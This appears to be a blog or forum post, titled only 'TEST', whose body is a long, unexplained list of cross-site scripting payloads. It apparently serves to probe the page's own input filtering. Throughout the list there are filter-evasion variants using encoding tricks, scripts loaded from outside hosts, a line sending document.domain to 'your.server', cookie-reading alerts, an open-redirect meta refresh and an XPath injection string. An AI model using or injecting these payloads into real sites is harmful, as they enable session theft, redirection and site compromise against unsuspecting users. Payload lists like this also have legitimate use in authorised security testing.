TEst

TEST

TEST

2 comments

<script src='//㉛.st'>

<svg/onload=import('//㉛.st')>

"><img src=x onerror=alert(document.domain)>

"onpointerenter=alert(document.domain)+

%0d%0a%0d%0a<script>alert(5)></script>

%3F%3f%0D%0AX-XSS-Protection%3a0%0D%0AContent-Encoding:%20utf-8%0D%0A%0D%0A28%0D%0A<script>alert(document.domain)</script>%0D%0A0%0D%0A%0D%0A

"><svg on onload=(alert)(1)>

"><svg on onload=(alert)(document.domain)>

<svg onx=() onload=(confirm)(1)>

<img ignored=() src=x onerror=prompt(1)>

<object data=javascript:confirm()>

<Img Src="javascript:alert(1)> 1"OnError=location=src//

<Img Src="//X55.is/> "OnError=import(src)//

<svg/on/oNloaD=alert``>

"><svg+svg+svg\/\/On+OnLoAd=confirm(1)>

"\/><img%20s+src+c=x%20on+onerror+%20="alert(1)"\>

1"><meta http-equiv="refresh" content="0; url=//gurelahmet.com?

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

<a"/onclick=(confirm)()>Click Here!

<svg onload=prompt%26%230000000040document.domain)>

<svg onload=prompt%26%23x000000028;document.domain)>

xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>

<--%253cimg%20onerror=alert(1)%20src=a%253e --!>

<a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'>

javascript:{ alert`0` }

1'"><img/src/onerror=.1|alert''>

<img src=x onError=import('//1152848220/')>

%2sscript%2ualert()%2s/script%2u

“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;

<svg on =i onload=alert(domain)

<svg/onload=location/**/='https://your.server/'+document.domain>

<svg onx=() onload=window.alert?.()>

test",prompt%0A/*HelloWorld*/(document.domain)

"onx=() onmouseover=prompt(1)>

" onxXxxXXxXXXxx=() autofocus onmouseover=prompt(1)>

"onx={} onmouseover=prompt(1)>

"onx=[] onmouseover=prompt(1)>

" onx={} onfocus=prompt(1)><! --

<svg asd onload=confirm(1)>

1"><img src=x onmouseover=prompt&#00000000000000000040;document.cookie&#00000000000000000041;

1"><img src="http://xss.cx/xss.svg onmouseover=prompt&#00000000000000000040;document.cookie&#00000000000000000041;

<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

<Svg/OnLoad=alert%25%0A26lpar;1)>

<img src="x" onerror="alert(1)//">

"-[8].find(confirm)-"

"-alert(document.domain)-"

'"><s>n0nce<img/src=x onerror=alert(document.domain)>

<iframe src="JavaScript: alert (/xss/)">

"//><<img src=x onerror=alert(7)></a>//

<object data=javascript:confirm()>

<img src=x onerror=alert(document.cookie)>

"><img src=x onerror=prompt(document.domain)>

"><img src=1 onerror=alert(1)>mmmc{{7*7}}{{'7'*7}}${'7'*7}

"><svg/onload=prompt(3)>

1"><img src=x onerror=prompt(document.domain)>":"test"}

"><img src=x onerror=alert(1)>

ahmet<details/open/ontoggle=alert(document.location)>

'"><svg/onload=prompt(5);>{{7*7}}

%0A<a'><x+'="><script>alert(1)</script>

">%0A<x+'="foo"><x+foo='><img+src=x+onerror=alert(1)>

test"><details/open/ontoggle=prompt(document.cookie)>

<IFRAME SRC="javascript:alert(document.cookie);"></IFRAME>

-[8].find(confirm)-

%27-%5Bdocument.domain%5D.find(confirm)-%27

“test”);print();a(“

<body onload=alert(/XSS/.source)>

<input autofocus onfocus=alert(1)>

<select autofocus onfocus=alert(1)>

<textarea autofocus onfocus=alert(1)>

<keygen autofocus onfocus=alert(1)>

<video/poster/onerror=alert(1)>

<video><source onerror="javascript:alert(1)">

<video src=_ onloadstart="alert(1)">

<details/open/ontoggle="alert`1`">

<audio src onloadstart=alert(1)>

<marquee onstart=alert(1)>

<Svg%K9OnLoad=%7Krompt%6K1%6K>

22autofocus/onfocus%0A=%0A%22[2].find(confirm)

"&lt;SCRIPT&gt;alert(3);&lt;/SCRIPT&gt;

"&lt;SCRIPT&gt;alert(document.cookie);&lt;/SCRIPT&gt;

"ononmouseovermouseover=javascript:window.ononerrorerror=alert;throw[1] c="

"><img src=x onerror=alert(1)>"

<div onpointerover="alert(5)">MOVE HERE</div>

"><svg/onload=prompt(3)>

<svg/onload=prompt(3)>

<sCriPt>aLeRt(6)</sCriPt>

'"><svg/onload=prompt(5);>{{7*7}}

<x onpointerRawupdatE=+alert&#40;document.domain&#41;>

<script>x"onfocus="alert(1)"autofocus="x

"><img src=x onerror=alert(1)> ->

ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 ->

#<img src=x onerror=alert(5)>

</script><script>&#0000097lert('l33t')

<audio src=1 onerror=alert('l33t')>

<svg/onload=alert(7)>

"><iMg SrC=oNeRROr='alert('l33t');'>

<input onfocus=alert(document.domain) </autofocus>

<audio src=1 onerror=confirm(7)>

"><iMg SrC=oNeRROr='prompt(3);'>

%22%3E%3CiMg%20SrC%3DoNeRROr%3D%27prompt(3)%3B%27%3E

"onmouseover="confirm(document.domain)"

<script>alert(1)</script>

<script>prompt(1)</script>

<script>confirm(1)</script>

<svg onload=prompt(1)>

"><svg/onload=prompt(7)>

<img src=xss onerror=alert(1)>

<svg/on<script>load=prompt(document.cookie);>

"><img src=xss onerror=prompt(1)>

<img src="javascript:alert(1);">

<sc<script>ript>alert(1)</sc</script>ript>

<style type='text/less'>x{x:`alert(1)`}</style>

xxx', x : window.location.assign("https://www.google.com/+document.domain"),//

-alert(1)-

"-prompt(1)-"

"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>

"><svg onload=prompt(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))>

http://www.<script>alert(1)</script .com

%00%00%00%00%00%00%00<script%20src=http://xss.rocks/xss.js></script>

'}) %26%2359a=confirm%26%2359a(document.domain)%26%2359b({asd:'

%0A</script><script>alert(/xss/)//

{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(2),a')}}

hacker' or 1=1 ]/parent::node()/name%00

<script>alert(123);</script>

<ScRipT>alert("XSS");</ScRipT>

<script>alert(123)</script>

<script>alert("hellox worldss");</script>

<script>alert(“XSS”)</script>

<script>alert(“XSS”);</script>

<script>alert(‘XSS’)</script>

“><script>alert(“XSS”)</script>

<script>alert(/XSS”)</script>

<script>alert(/XSS/)</script>

</script><script>alert(1)</script>

‘; alert(1);

‘)alert(1);//

<ScRiPt>alert(1)</sCriPt>

<IMG SRC=jAVasCrIPt:alert(‘XSS’)>

<IMG SRC=”javascript:alert(‘XSS’);”>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG SRC=javascript:alert(‘XSS’)>

<img src=xss onerror=alert(1)>

<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>

<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}

<img/src=`%00` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=`%00`&NewLine; onerror=alert(1)&NewLine;

<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00

<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script

<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

<form><a href="javascript:\u0061lert&#x28;1&#x29;">X

</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>

<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>

<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a

http://www.google<script .com>alert(document.location)</script

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a

<img/src=@&#32;&#13; onerror = prompt('&#49;')

<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;

<script ^__^>alert(String.fromCharCode(49))</script ^__^

</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(

&#00;</form><input type&#61;"date" onfocus="alert(1)">

<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>

<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

<script ~~~>alert(0%0)</script ~~~>

<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>

<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

<iframe/%00/ src=javaSCRIPT&colon;alert(1)

//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}

<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>

<div onmouseover='alert&lpar;1&rpar;'>DIV</div>

<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

<var onmouseover="prompt(1)">On Mouse Over</var>

<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>

<img src="/" =_=" title="onerror='prompt(1)'">

<%<!--'%><script>alert(1);</script -->

<script src="data:text/javascript,alert(1)"></script>

<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<input value=<><iframe/src=javascript:confirm(1)

<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

http://www.<script>alert(1)</script .com

<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>

<svg><script ?>alert(1)

<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

<img src=`xx:xx`onerror=alert(1)>

<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>

<math><a xlink:href="//jsfiddle.net/t846h/">click

<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

<svg contentScriptType=text/vbs><script>MsgBox+1

<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F

<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>

<script>+-+-1-+-+alert(1)</script>

<body/onload=&lt;!--&gt;&#10alert(1)>

<script itworksinallbrowsers>/*<script* */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

<svg><script>//&NewLine;confirm(1);</script </svg>

<svg><script onlypossibleinopera:-)> alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

<script x> alert(1) </script 1=2

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>

<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>

‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=”jav ascript:alert(‘XSS’);”>

<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

%253cscript%253ealert(1)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>